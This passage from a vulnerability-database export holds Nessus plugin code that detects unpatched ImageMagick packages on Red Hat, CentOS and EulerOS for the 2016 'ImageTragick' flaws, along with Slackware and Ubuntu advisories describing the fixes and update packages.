or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0726\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\n\n if 
(rpm_check(release:\"RHEL6\", reference:\"ImageMagick-debuginfo-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-debuginfo-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:30:37", "description": "An update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. 
A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.", "edition": 30, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "title": "CentOS 6 / 7 : ImageMagick (CESA-2016:0726) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-11T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:ImageMagick", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:ImageMagick-doc", "p-cpe:/a:centos:centos:ImageMagick-c++", "p-cpe:/a:centos:centos:ImageMagick-devel", "p-cpe:/a:centos:centos:ImageMagick-perl", "p-cpe:/a:centos:centos:ImageMagick-c++-devel"], "id": "CENTOS_RHSA-2016-0726.NASL", "href": "https://www.tenable.com/plugins/nessus/91020", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0726 and \n# CentOS Errata and Security Advisory 2016:0726 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91020);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"RHSA\", value:\"2016:0726\");\n\n script_name(english:\"CentOS 6 / 7 : ImageMagick (CESA-2016:0726) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. 
(CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-May/021865.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d280230\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-May/021866.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eefa6faa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3714\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? 
release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:51:40", "description": "According to the versions of the ImageMagick packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that ImageMagick did not properly\n sanitize certain input before passing it to the\n delegate functionality. A remote attacker could create\n a specially crafted image that, when processed by an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities, would lead to\n arbitrary execution of shell commands with the\n privileges of the user running the\n application. (CVE-2016-3714)\n\n - It was discovered that certain ImageMagick coders and\n pseudo-protocols did not properly prevent security\n sensitive operations when processing specially crafted\n images. A remote attacker could create a specially\n crafted image that, when processed by an application\n using ImageMagick or an unsuspecting user using the\n ImageMagick utilities, would allow the attacker to\n delete, move, or disclose the contents of arbitrary\n files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n - A server-side request forgery flaw was discovered in\n the way ImageMagick processed certain images. A remote\n attacker could exploit this flaw to mislead an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities into, for example,\n performing HTTP(S) requests or opening FTP sessions via\n specially crafted images. (CVE-2016-3718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : ImageMagick (EulerOS-SA-2016-1021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-05-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ImageMagick-perl", "p-cpe:/a:huawei:euleros:ImageMagick-c++", "p-cpe:/a:huawei:euleros:ImageMagick", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2016-1021.NASL", "href": "https://www.tenable.com/plugins/nessus/99784", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99784);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-3714\",\n \"CVE-2016-3715\",\n \"CVE-2016-3716\",\n \"CVE-2016-3717\",\n \"CVE-2016-3718\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : ImageMagick (EulerOS-SA-2016-1021)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ImageMagick packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that ImageMagick did not properly\n sanitize certain input before passing it to the\n delegate functionality. 
A remote attacker could create\n a specially crafted image that, when processed by an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities, would lead to\n arbitrary execution of shell commands with the\n privileges of the user running the\n application.(CVE-2016-3714)\n\n - It was discovered that certain ImageMagick coders and\n pseudo-protocols did not properly prevent security\n sensitive operations when processing specially crafted\n images. A remote attacker could create a specially\n crafted image that, when processed by an application\n using ImageMagick or an unsuspecting user using the\n ImageMagick utilities, would allow the attacker to\n delete, move, or disclose the contents of arbitrary\n files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n - A server-side request forgery flaw was discovered in\n the way ImageMagick processed certain images. A remote\n attacker could exploit this flaw to mislead an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities into, for example,\n performing HTTP(S) requests or opening FTP sessions via\n specially crafted images. (CVE-2016-3718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7e626634\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ImageMagick packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ImageMagick-6.7.8.9-13\",\n \"ImageMagick-c++-6.7.8.9-13\",\n \"ImageMagick-perl-6.7.8.9-13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:27", "bulletinFamily": "unix", "cvelist": 
["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "description": "New imagemagick packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/imagemagick-6.8.6_10-i486-2_slack14.1.txz: Rebuilt.\n This update addresses several security issues in ImageMagick, including:\n Insufficient shell characters filtering allows code execution (CVE-2016-3714)\n Server Side Request Forgery (CVE-2016-3718)\n File deletion (CVE-2016-3715)\n File moving (CVE-2016-3716)\n Local file read (CVE-2016-3717)\n To mitigate these issues, the default policy.xml config file has been\n modified to disable all of the vulnerable coders.\n For more information, see:\n https://imagetragick.com\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3714\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3718\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3715\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3716\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3717\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/imagemagick-6.7.7_10-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/imagemagick-6.7.7_10-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/imagemagick-6.8.6_10-i486-2_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/imagemagick-6.8.6_10-x86_64-2_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/imagemagick-6.9.4_1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/imagemagick-6.9.4_1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\ne78d8825fc122e9411b9bbde341ce8da imagemagick-6.7.7_10-i486-2_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n20bbb69e3a774f9493b3c87a90692b8f imagemagick-6.7.7_10-x86_64-2_slack14.0.txz\n\nSlackware 14.1 package:\n26aa6ce379628b85df0818b17d5b855d imagemagick-6.8.6_10-i486-2_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n3060644c634984224e448ecd03bd0eb1 imagemagick-6.8.6_10-x86_64-2_slack14.1.txz\n\nSlackware -current package:\n7add4b4c162a9e59ae309ea38430e44e xap/imagemagick-6.9.4_1-i586-1.txz\n\nSlackware x86_64 -current package:\n73a376cb32a9fbf529340982dfdb9b88 xap/imagemagick-6.9.4_1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg imagemagick-6.8.6_10-i486-2_slack14.1.txz", "modified": "2016-05-11T06:33:30", "published": "2016-05-11T06:33:30", "id": "SSA-2016-132-01", "href": 
"http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.440568", "type": "slackware", "title": "[slackware-security] imagemagick", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:41:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717", "CVE-2016-5118"], "description": "Nikolay Ermishkin and Stewie discovered that ImageMagick incorrectly \nsanitized untrusted input. A remote attacker could use these issues to \nexecute arbitrary code. These issues are known as \"ImageTragick\". This \nupdate disables problematic coders via the /etc/ImageMagick-6/policy.xml \nconfiguration file. In certain environments the coders may need to be \nmanually re-enabled after making sure that ImageMagick does not process \nuntrusted input. (CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, \nCVE-2016-3717, CVE-2016-3718)\n\nBob Friesenhahn discovered that ImageMagick allowed injecting commands via \nan image file or filename. A remote attacker could use this issue to \nexecute arbitrary code. (CVE-2016-5118)", "edition": 5, "modified": "2016-06-02T00:00:00", "published": "2016-06-02T00:00:00", "id": "USN-2990-1", "href": "https://ubuntu.com/security/notices/USN-2990-1", "title": "ImageMagick vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:39", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717", "CVE-2016-5118"], "description": "USN-2990-1 